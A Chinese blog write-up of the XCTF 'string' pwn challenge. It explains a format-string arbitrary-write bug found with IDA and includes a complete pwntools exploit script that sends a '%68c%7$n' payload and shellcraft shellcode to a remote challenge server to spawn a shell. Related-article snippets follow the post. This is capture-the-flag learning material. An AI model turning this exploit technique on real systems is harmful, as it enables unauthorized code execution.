xctf-pwn 之string

最新推荐文章于 2022-11-05 18:25:06 发布
最新推荐文章于 2022-11-05 18:25:06 发布
阅读量823 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neuisf/article/details/103756278
版权

此题未解出来,参考writeup后总结如下。

解题思路:

       漏洞点在"give me a address“处,通过IDA反编译后,F5生成C伪代码,分析数据流,发现运行shellcode的条件:*a1==a1[1]。a1为整形指针(见函数参数声明),指向secret 0,a1[1]指向secret 1(见main函数)。通过格式化字符串任意地址写入漏洞使之相等,再利用pwntools生成shellcode运行。

考察内容:

       1.IDA的使用技巧:F5查看C伪代码;

       2.控制流、数据流分析,找到执行shellcode的条件;

       3.pwntools生成shellcode方法和远程交互方法:recvuntil("some string\n")、sendlineafter("some string\n","str"),

         设置程序上下文:context(arch='amd64',os='linux')

exp(参考引用自writeup,修改a1[1]为68)

from pwn import *

#p=process("Downloads/mystring")
p=remote("111.198.29.45","48546")
context(arch='amd64',os='linux')
p.recvuntil("secret[0] is ")
addr0=p.recvuntil('\n')
print "addr0: 0x"+addr0
p.recvuntil("secret[1] is ")
addr1=p.recvuntil('\n')
print "addr1: 0x"+addr1

p.sendlineafter("hat should your character's name be:\n","abc")
p.sendlineafter("So, where you will go?east or up?:\n","east")
p.sendlineafter("go into there(1), or leave(0)?:\n","1")
p.sendlineafter("'Give me an address'\n",str(int(addr1,16)))
p.sendlineafter("And, you wish is:\n","%68c%7$n")
p.sendlineafter("USE YOU SPELL\n",asm(shellcraft.sh()))
p.interactive()
 

neuisf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
string(xctf)
weixin_43868725的博客
05-06 346
0x0 程序保护和流程 保护: 流程: main() 将v3变量的地址赋值给v4,输出v3和v3+4的地址。调用sub_400D72(v4)。 sub_400D72() 如果名字长度小于12就分别调用三个函数。 sub_400A7D() 如果输入east就会返回,否则就会进入sub_4009DD(),然后无论如何都会结束程序。 sub_400BB9() 输入east之后就会进入这个函数。...
xctf string
pondzhang的专栏
12-09 202
from pwn import * #p = process('./string') p = remote("220.249.52.133",37754) p.recvuntil('secret[0] is ') addr = int(p.recv(7),16) log.sucess(hex(addr)) p.recvuntil("name be:\n") p.sendline('test') p.recvuntil('east or up?:\n') p.sendline('east') p.recv.
XCTF|PWN-string-WP
l2645470582_的博客
08-07 222
1、下载文件并开启靶机 2、在Linux中查看文件信息 checksec 5 我们看到: 1.该文件是64位的文件 2.启用了nx 3、用命令运行程序 seccomp-tools dump ./5 我们会发现一个图案 继续往下翻 we are wizard, we will give you hand, you can not defeat dragon by yourself ... we will tell you two secret ... ...
pwn string
weixin_45677731的博客
03-13 607
题目来源:攻防世界 拿到题目后checksec 可以看到是64位的,拖到ida里看一下 有个v3=malloc(8ull) 这个函数查了一会儿,分配内存的,最后的结果就是v3前面放了68,后面放了85 点进sub_400d72这个函数看一下 可以看到这里有三个主要的函数,我们逐个分析 第一个 ...
[PWN](攻防世界)string
ljh15937的博客
09-21 1160
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
xctf pwn 新手练习题总结
neuisf的博客
01-21 790
所谓总结,就是再做一遍!以达到熟能生巧之境界! 0x01 level0 解题思路: ret2text 1.checksec ,文件为amd64位格式,进开启可NX; 2.IDA Pro F5反编译,main程序调用vulnerable_function,vulnerable_function中调用read读取用户输入,存在缓冲区溢出; 3.程序代码中由callsystem函数,运行systerm...
攻防世界 pwn string
N1rvana的博客
11-15 3905
攻防世界string应该是新手区数一数二的难题,难点在理解程序流程。 先观察主函数: alarm函数 什么是alarm函数? 如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数,即十进制对应60,所以该函数的作用是在程序运行60秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。 为什么要使用alarm函数? 一是比赛中常要远程连接服务器解题,官方不希望有队伍长时间解不出来题浪费服务器资源 二
攻防世界pwn——string
qq_62076255的博客
11-05 667
攻防世界pwn——string
string 格式化字符串漏洞 xctf
qq_62539372的博客
04-07 3478
借着这道题了解一下格式化字符串漏洞 查看一下保护 放进64位的IDA分析一下程序 这道题涉及C语言的指针 好好学C main() 分析得v3=v4 v4(v3) 8ull 前四位是68 后四位85 执行sud_400D72() 传的参数是v4 继续执行 分析一下 输入 个名字 不能太长 然后east 1 关键的部分来了 print(&format,&format)格式化字符串漏洞 给我个地址 就是第一个秘密 (好好思考一下 关键是悟) 把85传进去 看一下是第几个参数呢
【攻防世界pwn-string
a_silly_coder的博客
05-18 288
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
攻防世界pwn新手练习(string
BurYiA的博客
12-25 1654
string 首先我们看一下程序的保护机制 程序开了NX(堆栈不可执行)、CANARY(栈保护)和PELRO 程序太长了,我们就不运行了,在IDA中我们查一下有没有什么明显的地方 在这个函数里面 我们发现了一个格式化字符串漏洞,在他的上面有两个输入点,一个是“%ld”格式,一个是“%s”格式 我们在往下看,紧接着的函数里有这么一个东西 代码执行,条件是a1这个数组里面的第一个数字等于第二个数字 ...
XCTF PWN高手进阶区之JS
neuisf的博客
01-27 370
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印re...
XCTF(攻防世界)—新手web题Write Up
Lemon's blog
07-10 2651
前言:之前一直没有接触过web这方面的题,这次利用暑假时光好好学习,web真的是很有趣,虽然有的题很简单,但可以学习到很多知识,话不多说,做题。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值